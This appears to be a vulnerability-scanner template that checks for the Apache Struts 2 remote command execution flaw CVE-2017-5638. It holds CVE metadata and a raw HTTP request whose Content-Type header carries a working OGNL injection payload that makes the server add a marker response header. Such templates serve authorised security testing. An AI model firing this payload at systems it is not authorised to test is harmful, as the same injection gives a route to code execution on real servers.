id: CVE-2017-5638-128
info:
  author: Random_Robbie
  classification:
    cve-id: CVE-2017-5638
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-20
  description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable
    to remote command injection attacks through incorrectly parsing an attacker's
    invalid Content-Type HTTP header. The Struts vulnerability allows these commands
    to be executed under the privileges of the Web server.
  name: Apache Struts 2 - Remote Command Execution
  reference:
  - https://github.com/mazen160/struts-pwn
  - https://nvd.nist.gov/vuln/detail/CVE-2017-5638
  - https://isc.sans.edu/diary/22169
  - https://github.com/rapid7/metasploit-framework/issues/8064
  severity: critical
  tags: apache,kev,msf,cve,cve2017,struts,rce
requests:
- matchers:
  - part: header
    type: word
    words:
    - 'X-Hacker: Bounty Plz'
  raw:
  - 'GET / HTTP/1.1

    Host: {{Hostname}}

    Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1

    Content-Type: %{#context[''com.opensymphony.xwork2.dispatcher.HttpServletResponse''].addHeader(''X-Hacker'',''Bounty
    Plz'')}.multipart/form-data

    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

    '
